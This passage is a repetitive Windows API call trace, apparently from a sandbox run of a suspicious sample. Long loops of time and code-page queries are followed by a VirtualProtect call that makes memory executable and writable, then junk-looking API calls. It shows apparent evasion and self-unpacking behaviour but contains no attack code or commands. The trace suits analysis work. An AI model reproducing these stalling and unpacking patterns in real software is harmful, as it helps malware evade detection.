out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.851] GetACP () returned 0x4e4 [0113.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.852] GetACP () returned 0x4e4 [0113.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.853] GetACP () returned 0x4e4 [0113.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.854] GetACP () returned 0x4e4 [0113.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.855] GetACP () returned 0x4e4 [0113.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.921] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.921] GetACP () returned 0x4e4 [0113.921] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.922] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.922] GetACP () returned 0x4e4 [0113.922] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0113.923] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0113.923] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0113.923] GetACP () returned 0x4e4 [0114.156] VirtualProtect (in: lpAddress=0x5f5ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.157] AddAtomA (lpString=0x0) returned 0x0 [0114.157] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.157] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.158] AddAtomA (lpString=0x0) returned 0x0 [0114.158] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.158] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.159] AddAtomA (lpString=0x0) returned 0x0 [0114.159] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.159] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | 